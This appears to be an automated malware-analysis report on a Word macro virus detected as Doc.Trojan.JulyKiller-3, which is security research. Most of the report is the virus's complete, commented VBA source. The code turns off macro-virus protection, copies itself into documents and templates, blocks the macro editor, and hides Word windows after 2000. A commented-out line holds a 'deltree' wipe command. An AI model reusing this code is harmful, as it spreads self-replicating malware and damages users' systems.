Verdict: MALICIOUS (Risk Score 196)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious purposes. The 'Y2K' module attempts to disable virus protection and manipulate macro settings, likely to facilitate the execution of a secondary payload from a file named 'Autoexec.dot' located in the startup path.
Heuristics (6)

- ClamAV: Doc.Trojan.JulyKiller-3 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.JulyKiller-3.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION). VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). AutoOpen macro. Matched line in script: `If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Auto_Close macro. Matched line in script: `If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7193 bytes |

SHA-256 of macros.bas: 1e74216c39538ad1e72b589190743436db4ca367a20df396eb35d8ed5cf4edd3
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Y2K"

' Hides any open Visual Basic Editor window so the macro code cannot be inspected.
Sub actNo()
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
End Sub

' Infection routine, invoked from every auto-executing entry point below.
Sub Autos()
    Dim file$
    Dim ans$
    Dim test
    Dim mItem
    Dim cItem
    Dim aDoc
    Dim aTemp
    Dim vset
    Dim Iset
    Dim ad
    Dim y2kDate As Long
    Application.ScreenUpdating = False
    ' Unload any installed Autoexec.dot add-in and point the Word startup
    ' path at C:\, where the virus keeps its own Autoexec.dot.
    For Each ad In AddIns
        If ad.Name = "Autoexec.dot" Then
            ad.Installed = False
        End If
    Next ad
    With Dialogs(wdDialogToolsOptionsFileLocations)
        .path = "STARTUP-PATH"
        .Setting = "c:\"
        .Execute
    End With
    ' Turn off Word's macro-virus protection (the line matched by OLE_VBA_MACRO_VIRUS_REPLICATION).
    If Options.VirusProtection Then
        Options.VirusProtection = False
    End If
    file$ = WordBasic.[MacroFileName$]()
    ' Branch taken when running from Autoexec.dot: check whether any open document
    ' or Normal.dot already carries the Y2K module; if none does, copy it into all of them.
    If InStr(file$, "Autoexec") <> 0 Then
        For Each aDoc In Documents
            For Each cItem In aDoc.VBProject.VBComponents
                If (cItem.Name = "Y2K") Then
                    vset = 1
                End If
            Next cItem
        Next aDoc
        For Each cItem In NormalTemplate.VBProject.VBComponents
            If (cItem.Name = "Y2K") Then
                vset = 1
            End If
        Next cItem
        If vset <> 1 Then
            'WordBasic.DisableAutoMacros
            Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
            For Each aDoc In Documents
                If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
                End If
            Next aDoc
            For Each aTemp In Templates
                If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
                    WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
                End If
            Next aTemp
            ActiveDocument.Save
            ActiveDocument.Close
        End If
        If vset = 1 Then
            GoTo out
        End If
    End If
    ' Branch taken from an infected document: if C:\Autoexec.dot does not exist yet,
    ' create a new template, copy the Y2K module into it and save it there.
    With Application.FileSearch
        .LookIn = "C:\"
        .FileName = "Autoexec.dot"
        If .Execute > 0 Then
            Iset = 1
        End If
    End With
    If Iset <> 1 Then
        'WordBasic.DisableAutoMacros
        Documents.Add NewTemplate:=True
        WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
        ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
        ActiveDocument.Close
    End If
    ' Delete competing auto macros from every other unprotected document and template.
    For Each aDoc In Documents
        If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
            For Each cItem In aDoc.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aDoc.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aDoc
    For Each aTemp In Templates
        If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
            For Each cItem In aTemp.VBProject.VBComponents
                If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
                    aTemp.VBProject.VBComponents.Remove (cItem)
                End If
            Next cItem
        End If
    Next aTemp
    ' Copy the Y2K module into every open document and loaded template.
    For Each aDoc In Documents
        If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
            WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
        End If
    Next aDoc
    For Each aTemp In Templates
        If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
            WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
        End If
    Next aTemp
out:
    ' Rebind the standard macro shortcuts (Alt+F8 macro dialog, Alt+F11 VBE) to
    ' FileSaveAs, move ToolsMacro and ViewVBCode to Alt+F1 / Alt+F2, and bind
    ' Alt+Z to backY2k, which undoes the payload below.
    CustomizationContext = NormalTemplate
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
    Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyZ))
    myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="backy2k"
    ' Redirect the Tools menu entries of a Chinese-language Word UI (Customize,
    ' Templates and Add-ins, Options, Macro, Visual Basic Editor) to actNo, then
    ' lock every visible toolbar against customization.
    For Each mItem In CommandBars("Tools").Controls
        If mItem.Caption = "自定义(&C)..." Then
            mItem.OnAction = "actno"
        End If
        If mItem.Caption = "模板和加载项(&I)..." Then
            mItem.OnAction = "actno"
        End If
        If mItem.Caption = "选项(&O)..." Then
            mItem.OnAction = "actno"
        End If
    Next mItem
    For Each cItem In CommandBars("Tools").Controls
        If cItem.Type = msoControlPopup Then
            If cItem.Caption = "宏(&M)" Then
                For Each mItem In cItem.CommandBar.Controls
                    If mItem.Caption = "宏(&M)..." Then
                        mItem.OnAction = "actno"
                    End If
                    If mItem.Caption = "Visual Basic 编辑器(&V)" Then
                        mItem.OnAction = "actno"
                    End If
                Next mItem
            End If
        End If
    Next cItem
    For Each cItem In CommandBars("Visual Basic").Controls
        cItem.OnAction = "actno"
    Next cItem
    For Each cItem In CommandBars
        If cItem.Visible = True Then
            cItem.Protection = msoBarNoCustomize
        End If
    Next cItem
    For Each myTask In Tasks
        If InStr(myTask.Name, "Visual Basic") > 0 Then
            myTask.Visible = False
        End If
    Next myTask
    Application.ScreenUpdating = True
    On Error GoTo Pun
    WordBasic.FileSaveAll 1, 1
Pun:
    ' Trigger check: date serial 36526 is 1 January 2000. On that day, or with
    ' about a 1-in-10 chance on any later day, hide every Word window. The
    ' commented-out lines would have written a destructive deltree command to autoexec.bat.
    y2kDate = Int(Now())
    On Error GoTo -1
    On Error GoTo -1
    If y2kDate >= 36526 Then
        If y2kDate = 36526 Or (Rnd() * 100000 Mod 10) = 2 Then
            'Open "C:\autoexec.bat" For Output As 1
            'Print #1, "deltree/y c:\"
            'Close 1
            For Each myTask In Tasks
                If InStr(myTask.Name, "Word") > 0 Then
                    myTask.Visible = False
                End If
            Next myTask
        End If
    End If
End Sub

' Auto-executing entry points: document open, close, new, and Word startup.
Sub AutoOpen()
    Autos
End Sub
Sub autoclose()
    Autos
End Sub
Sub autoNew()
    Autos
End Sub
Sub autoexec()
    Autos
End Sub

' Restores the hidden Word windows; bound to Alt+Z above.
Sub backY2k()
    For Each myTask In Tasks
        If InStr(myTask.Name, "Word") > 0 Then
            myTask.Visible = True
        End If
    Next myTask
End Sub
```